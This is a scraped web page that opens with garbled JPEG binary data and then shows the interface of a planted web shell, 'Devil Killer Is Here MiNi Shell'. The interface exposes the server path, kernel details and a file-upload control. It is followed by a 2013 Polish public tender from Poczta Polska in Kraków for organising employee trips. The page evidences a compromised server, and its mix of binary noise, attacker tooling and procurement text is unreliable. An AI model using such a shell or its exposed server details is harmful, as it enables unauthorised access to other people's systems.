JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130228/82744-N-2013.html

<p class="kh_header"><b>Kraków: Zorganizowanie wycieczek turystycznych dla pracowników: Bolonia- Rzym-Watykan, Góry Stołowe-Praga, Mazury-Wilno-Kowno</b><br>
<b>Numer ogłoszenia: 82744 - 2013; data zamieszczenia: 28.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poczta Polska S.A. Region Infrastruktury w Krakowie , ul. Westerplatte 20, 31-045 Kraków, woj. małopolskie, tel. 12 4229095, faks 12 4222153; 12 4229033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poczta-polska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie wycieczek turystycznych dla pracowników: Bolonia- Rzym-Watykan, Góry Stołowe-Praga, Mazury-Wilno-Kowno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.	Przedmiotem zamówienia jest organizacja wycieczek turystyczno - krajoznawczych. Postępowanie prowadzone jest z podziałem na 3 części.
Część nr 1: zorganizowanie 6 - dniowej wycieczki turystycznej Bolonia - Rzym - Watykan
Część nr 2: zorganizowanie 3 - dniowej wycieczki turystycznej Góry Stołowe + Praga
Część nr 3: zorganizowanie 6 - dniowej wycieczki turystycznej Mazury - Wilno - Kowno
3.2.	Opis przedmiotu zamówienia w zakresie części nr 1 tj. 6 - dniowa wycieczka turystyczna Bolonia - Rzym - Watykan
Terminy:  w okresie 1 V - 30.VI.br 
Ilość uczestników: 198 osób dorosłych płatnych + 2 miejsca gratis - dwie grupy po 100 osób tj. 2 terminy 
3.3.	Opis przedmiotu zamówienia w zakresie części nr 2 tj. 3 - dniowa wycieczka turystyczna Góry Stołowe + Praga.
Terminy:  w okresie 1 V - 30.VI.br 
Ilość uczestników: 198 osób dorosłych płatnych + 2 miejsca gratis - dwie tury po 100 osób tj. 2 terminy
3.4.	Opis przedmiotu zamówienia w zakresie części nr 3 tj. 6 - dniowa wycieczka turystyczna Mazury - Wilno - Kowno
Terminy:  w okresie 1 V - 30.VI.br 
Ilość uczestników: 198 osób dorosłych płatnych + 2 miejsca gratis - dwie tury po 100 osób tj. 2 terminy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda składana oferta musi być zabezpieczona wadium w wysokości: 
Część nr 1 - 3 000,00 zł (słownie: trzy tysiące złotych 00/100)
Część nr 2 - 2 000,00 zł (słownie: dwa tysiące złotych 00/100)
Część nr 3 - 2 500,00 zł (słownie: dwa tysiące pięćset złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, iż jest podmiotem uprawnionym do organizowania imprez turystycznych oraz pośredniczenia na zlecenie klientów w zawieraniu umów o świadczenie usług turystycznych. Ocena spełnienia warunku nastąpi w oparciu o aktualny wydruk potwierdzający wpis wykonawcy do Centralnej Ewidencji Organizatorów Turystyki i Pośredników Turystycznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawcy zobowiązani są wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonywali, co najmniej 3 umowy na usługi zorganizowania wycieczek zagranicznych dla osób dorosłych min. 100 osób każda umowa (niezależnie od tego na ile części wykonawca złoży ofertę wymaga się co najmniej 3 umów opisanych powyżej), a usługi zostały wykonane należycie,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>O udzielenie zamówienia ubiegać się może wykonawca wobec którego nie zachodzą przesłanki do wykluczenia na podstawie art. 24 ust. 2 pkt 5 ustawy pzp.
Ocena spełnienia tego wymogu nastąpi w oparciu o listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, albo informację o tym, że Wykonawca nie należy do grupy kapitałowej - wg wzoru stanowiącego załącznik nr 6 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - atrakcyjność programu wycieczki - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość rezygnacji Zamawiajacego z realizacji umowy maksymalnie do 20% z ilości uczestników wycieczki wyszczególnionej w §1 wzoru umowy, a tym samym zmniejszenia ceny, o której mowa w §5 ust.2 wzoru umowy gdy Zamawiający powiadomi Wykonawcę o tym fakcie w formie pisemnej nie później niż na 3 dni przed rozpoczęciem usługi. Zmniejszenie ilości uczestników wycieczki w stosunku do ilości deklarowanej  powoduje odpowiednie zmniejszenie ceny usługi w oparciu o stawkę określoną w §5 ust.1 i ilość osób objętą rezygnacją z uczestnictwa. Powyższe dotyczy każdej części oddzielnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.poczta-polska.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poczta Polska S.A. RI w Krakowie ul. Westerplatte 20, 31-045 Kraków pok. 408.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2013 godzina 12:00, miejsce: Poczta Polska S.A. RI w Krakowie ul. Westerplatte 20, 31-045 Kraków pok. 408.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 10.04.2013.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inne dokumenty, które musi zawierać oferta:
1.	Podpisany formularz oferty - zgodny z załącznikiem nr 1.
2.	Autorski program wycieczki przygotowany przez Wykonawcę.  
3.	Zamawiający żąda, aby Wykonawca do oferty dołączył dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty, np. aktualny odpis z właściwego rejestru, zaświadczenie o wpisie do centralnej ewidencji i informacji o działalności gospodarczej, aktualny statut spółki lub aktualny rejestr handlowy. Wymagane dokumenty można złożyć w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
4.	Jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika z załączonego dokumentu, o którym mowa w ust. 3, do oferty należy dołączyć także pełnomocnictwo w oryginale lub w postaci kopii poświadczonej notarialnie.
5.	Dowód wpłaty wadium - jeżeli wadium wniesione będzie przelewem; jeżeli wadium wniesione będzie w formie gwarancji lub poręczenia, do oferty należy załączyć potwierdzoną kopię poręczeń lub gwarancji oraz do koperty oryginał luzem,.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja 6 - dniowej wycieczki turystycznej Bolonia - Rzym - Watykan.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia w zakresie części nr 1 tj. 6 - dniowa wycieczka turystyczna Bolonia - Rzym - Watykan
Terminy:  w okresie 1 V - 30.VI.br 
Ilość uczestników: 198 osób dorosłych płatnych + 2 miejsca gratis - dwie grupy po 100 osób tj. 2 terminy 
Standard obiektu:
3 noclegi - hotel, pokoje 2 osobowe z łazienkami (łóżka podwójne tzw. małżeńskie - wykluczone). Dopuszcza się umiejscowienie hotelu w miejscowości wchodzącej w skład tzw. grupy satelit w odległości max. do 40 km od granic administracyjnych Rzymu. W ofercie Wykonawca opisze proponowany hotel, jego otoczenie i położenie, wielkość pokoi i wyposażenia, inne typu restauracja, bar itp. Mile widziana prezentacja fotograficzna.
Wyżywienie: 
-	3 x śniadania w restauracji hotelowej -serwowane 
-	4 x obiadokolacje serwowane
-	1 x menu podczas imprezy integracyjnej
Transport:  4 autokary  wysokopokładowe klasy LUX (max. 5 letnie - zastrzega się możliwość kontroli dokumentów w tym zakresie) zapewniające miejsca siedzące dla wszystkich uczestników pilota i drugiego kierowcy, przewodnika, wyposażone w klimatyzację, wc, dvd. Min. 2 kierowców na 1 autokar. Wykonawca zobowiązuje się do zapewnienia autokaru zastępczego na wypadek awarii. 
Dopuszcza się wyjazd w godzinach popołudniowo-wieczornych.
Miejsca wyjazdu  przyjazdu: 
1 grupa - Kraków (róg ulic Westerplatte i Kopernika obok Hotelu Wyspiański) 1 autokar 50 osób, Tarnów ( ul. Kościuszki obok Hotelu Tarnovia) 1 autokar 50 osób,
2 grupa - Kraków (róg ulic Westerplatte i Kopernika obok Hotelu Wyspiański) autokar 50 osób, Nowy Sącz (ul. Obrońców Narviku obok Biedronki) 1 autokar 50 osób. 
W przypadku braku kompletu uczestników w autokarach wyjeżdżających/przyjeżdżających z do Tarnowa i Nowego Sącza Zleceniobiorca wymaga trasowania autokarów przez Kraków.
Ubezpieczenie: NNW, KL, bagaż
Świadczenia dodatkowe: opłaty: drogowe, parkingowe, autostradowe, ewentualne taksy klimatyczne, obsługa pilota na trasie (1 pilot na 1 autokar posługujący się językiem włoskim lub angielskim), obsługa lokalnego (polskojęzycznego) przewodnika w Bolonii (min. 3 godziny) w Rzymie (min. 7 godzin) w Watykanie (min.4 h) - 1 przewodnik  autokar).
Program: 
Wykonawca opisze program autorski wycieczki, który powinien zawierać opis poszczególnych punktów programu, kolejność zwiedzania - ze wskazaniem czy z udziałem lokalnego przewodnika (ilość godzin   minut), opis w zakresie wyżywienia (proponowanego menu), dodatkowych atrakcji typu impreza integracyjna (wraz z menu).

Bilety wstępu do zwiedzanych obiektów płatne osobno przez uczestników wycieczki. 
W ofercie Wykonawca poda orientacyjny koszt za wstępy. Kwota nie powinna przekroczyć 120 euro/osobę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. atrakcyjność programu wycieczki - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja 3 - dniowej wycieczki turystycznej Góry Stołowe + Praga..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia w zakresie części nr 2 tj. 3 - dniowa wycieczka turystyczna Góry Stołowe + Praga.
Terminy:  w okresie 1 V - 30.VI.br 
Ilość uczestników: 198 osób dorosłych płatnych + 2 miejsca gratis - dwie tury po 100 osób tj. 2 terminy
Standard obiektu:
2 noclegi - hotel min. *** w Kudowej Zdroju - pokoje 2 osobowe z łazienkami (łóżka podwójne tzw. małżeńskie - wykluczone). W ofercie Wykonawca opisze proponowany hotel, jego otoczenie i położenie, wielkość pokoi i wyposażenia, inne typu: restauracja, bar, basen, siłownia itp. Mile widziana prezentacja fotograficzna.
Wyżywienie: 
-	2 x śniadania w restauracji hotelowej (bufet szwedzki)
-	2 x obiadokolacje 
-	1 x menu podczas imprezy integracyjnej
Transport:  4 autokary  wysokopokładowe klasy LUX (max. 5 letnie - zastrzega się możliwość kontroli dokumentów w tym zakresie) zapewniające miejsca siedzące dla wszystkich uczestników (50 osób/ autokar), pilota, wyposażone w klimatyzację, wc, dvd. Wykonawca zobowiązuje się do zapewnienia autokaru zastępczego  na wypadek awarii.
Dopuszcza się wyjazd w godzinach rannych.
Miejsca wyjazdu/ przyjazdu: 
1 grupa - Kraków (róg ulic Westerplatte i Kopernika obok Hotelu Wyspiański) 1 autokar 50 osób, Tarnów (ul. Kościuszki obok Hotelu Tarnovia) 1 autokar 50 osób,
2 grupa - Kraków (róg ulic Westerplatte i Kopernika obok Hotelu Wyspiański) autokar 50 osób, Nowy Sącz (ul. Obrońców Narviku obok Biedronki) 1 autokar 50 osób. 
W przypadku braku kompletu uczestników w autokarach wyjeżdżających/przyjeżdżających z/do Tarnowa i Nowego Sącza Zleceniobiorca wymaga trasowania autokarów przez Kraków.
Ubezpieczenie: NNW, KL
Świadczenia dodatkowe: opłaty: drogowe, parkingowe, autostradowe, ewentualne taksy klimatyczne, obsługa pilota na trasie (1 pilot na 1 autokar), obsługa lokalnego (polskojęzycznego) przewodnika w Pradze (min. 7 godzin) - 1 przewodnik/ autokar).
Program: 
Wykonawca opisze program autorski wycieczki, który powinien zawierać opis poszczególnych punktów programu, kolejność zwiedzania - ze wskazaniem czy z udziałem lokalnego przewodnika (ilość godzin/ minut), opis w zakresie wyżywienia (proponowane menu), z uwzględnieniem imprezy integracyjnej przy muzyce mechanicznej. 
Bilety wstępu do zwiedzanych obiektów płatne osobno przez uczestników wycieczki. 
W ofercie Wykonawca poda orientacyjny koszt za wstępy. Kwota nie powinna przekroczyć w Pradze 300 KCZ, po stronie polskiej 50 zł / na osobę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. atrakcyjność programu wycieczki - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Organizacja 6 - dniowej wycieczki turystycznej Mazury - Wilno - Kowno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia w zakresie części nr 3 tj. 6 - dniowa wycieczka turystyczna Mazury - Wilno - Kowno
Terminy:  w okresie 1 V - 30.VI.br 
Ilość uczestników: 198 osób dorosłych płatnych + 2 miejsca gratis - dwie tury po 100 osób tj. 2 terminy
Standard obiektu:
2 noclegi - hotel w Augustowie, 1 nocleg - hotel *** w centrum Wilna, pokoje 2, 3 osobowe
z łazienkami (łóżka podwójne tzw. małżeńskie - wykluczone).  W ofercie Wykonawca opisze proponowany hotel, jego otoczenie i położenie, wielkość pokoi i wyposażenia, inne typu: restauracja, bar, basen, siłownia itp. Mile widziana prezentacja fotograficzna.
Wyżywienie: 
-	3 x śniadania w restauracji hotelowej (bufet szwedzki)
-	4 x obiadokolacja serwowana 
-	1 x menu podczas imprezy integracyjnej
Transport:  4 autokary  wysokopokładowe klasy LUX (max. 5 letnie - zastrzega się możliwość kontroli dokumentów w tym zakresie) zapewniające miejsca siedzące dla wszystkich uczestników (50 osób/ autokar) pilota i drugiego kierowcy, przewodnika, wyposażone w klimatyzację, wc, dvd. Min. 2 kierowców na 1 autokar. Wykonawca zobowiązuje się do zapewnienia autokaru zastępczego na wypadek awarii.
Dopuszcza się wyjazd w godzinach popołudniowo-wieczornych.
Miejsca wyjazdu/ przyjazdu: 
1 grupa - Kraków (róg ulic Westerplatte i Kopernika obok Hotelu Wyspiański) 1 autokar 50 osób, Tarnów ( ul. Kościuszki obok Hotelu Tarnovia) 1 autokar 50 osób,
2 grupa - Kraków (róg ulic Westerplatte i Kopernika obok Hotelu Wyspiański) autokar 50 osób, Nowy Sącz (ul. Obrońców Narviku obok Biedronki) 1 autokar 50 osób. 
W przypadku braku kompletu uczestników w autokarach wyjeżdżających/przyjeżdżających z/do Tarnowa i Nowego Sącza Zleceniobiorca wymaga trasowania autokarów przez Kraków.
Ubezpieczenie: NNW, KL, bagaż
